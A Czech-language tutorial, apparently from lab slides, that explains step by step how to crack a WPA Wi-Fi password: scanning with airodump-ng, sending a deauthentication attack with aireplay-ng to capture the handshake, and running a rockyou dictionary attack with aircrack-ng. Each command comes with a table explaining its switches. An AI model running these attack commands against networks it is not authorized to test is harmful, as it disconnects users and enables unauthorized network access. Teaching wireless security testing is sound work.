Detailní vysvětlení příkazů a parametrů
Předpoklad: Vaše Wi-Fi karta je již v Monitor módu (rozhraní wlan0mon).
Na každém slajdu najdete přesný příkaz i popis toho, co jednotlivé přepínače znamenají a co do nich doplnit.
Spusťte příkaz pro ověření stavu bezdrátové karty:
iwconfig
| Parametr | Co znamená | Co zde uvidím / co zadat |
|---|---|---|
| iwconfig | Příkaz pro výpis bezdrátových rozhraní | Nemá žádné přepínače. Hledám název rozhraní (např. wlan0mon) a stav Mode:Monitor. |
Spusťte celkové skenování všech rozsahů ve vzduchu:
sudo airodump-ng wlan0mon
| Parametr | Co znamená | Co do něj patří |
|---|---|---|
| sudo | Spuštění s právy správce (root) | Vyžadováno pro nízkoúrovňový přístup k síťové kartě. |
| airodump-ng | Nástroj pro skenování a odchytávání | Zobrazuje sítě v dosahu a jejich klienty. |
| wlan0mon | Název vaší Wi-Fi karty v monitor módu | Zadejte přesný název z 1. kroku (např. wlan0mon nebo wlan0). |
→ Z tabulky si opište BSSID (MAC routeru) a CH (číslo kanálu) vaší sítě.
Příklad příkazu pro zacílení na vybranou síť:
sudo airodump-ng -c 6 --bssid AA:BB:CC:11:22:33 -w pokus wlan0mon
| Přepínač | Co znamená | Co tam přesně napsat |
|---|---|---|
| -c 6 | Channel (Číslo kanálu sítě) | Zadejte číslo kanálu vaší sítě z Kroku 2 (např. -c 6 nebo -c 11). |
| --bssid AA:BB:... | MAC adresa routeru (AP) | Vložte přesnou MAC adresu z Kroku 2 ze sloupce BSSID. |
| -w pokus | Write (Název výstupního souboru) | Zvolte název souboru. Vytvoří se např. pokus-01.cap s odchyceným provozem. |
DŮLEŽITÉ: Toto okno nechte běhat! V dolní části si zapište MAC adresu klienta ze sloupce STATION.
V DRUHÉM okně terminálu pošlete deautentizační útok:
sudo aireplay-ng --deauth 5 -a AA:BB:CC:11:22:33 -c 99:88:77:66:55:44 wlan0mon
| Přepínač | Co znamená | Co tam přesně napsat |
|---|---|---|
| --deauth 5 | Počet odpojovacích paketů | Kolik paketů poslat (hodnota 5 až 10 stačí k odpojení). |
| -a AA:BB:CC:... | Access Point (BSSID routeru) | MAC adresa vysílače z Kroku 2. Útočíme pod jeho jménem. |
| -c 99:88:77:... | Client (Station MAC klienta) | MAC adresa odpojovaného klienta z dolní tabulky Kroku 3 ze sloupce STATION. |
Přepněte se do PRVNÍHO okna s airodump-ng a sledujte pravý horní roh:
Hledám zelené potvrzení:
[ WPA handshake: AA:BB:CC:11:22:33 ]
| Co to znamená? | Co musím udělat? |
|---|---|
Odchytili jsme 4 pakety přihlašovacího 4-Way Handshaku a jsou bezpečně zapsány v souboru pokus-01.cap. |
Stiskněte v 1. okně zkratku Ctrl + C pro ukončení skenování. Každé další skenování by vytvořilo nový soubor pokus-02.cap. |
Spusťte slovníkový útok v nástroji Aircrack-ng:
aircrack-ng -w /usr/share/wordlists/rockyou.txt pokus-01.cap
| Přepínač / Soubor | Co znamená | Co tam přesně napsat |
|---|---|---|
| -w /usr/.../rockyou.txt | Wordlist (Slovník hesel) | Cesta ke slovníku hesel v Kali Linuxu. Výchozí je /usr/share/wordlists/rockyou.txt. |
| pokus-01.cap | Vstupní soubor s handshakem | Soubor vytvořený v Kroku 3. Pozor na příponu -01.cap, kterou airodump-ng přidává automaticky! |
Výsledek: KEY FOUND! [ odhaleneheslo ]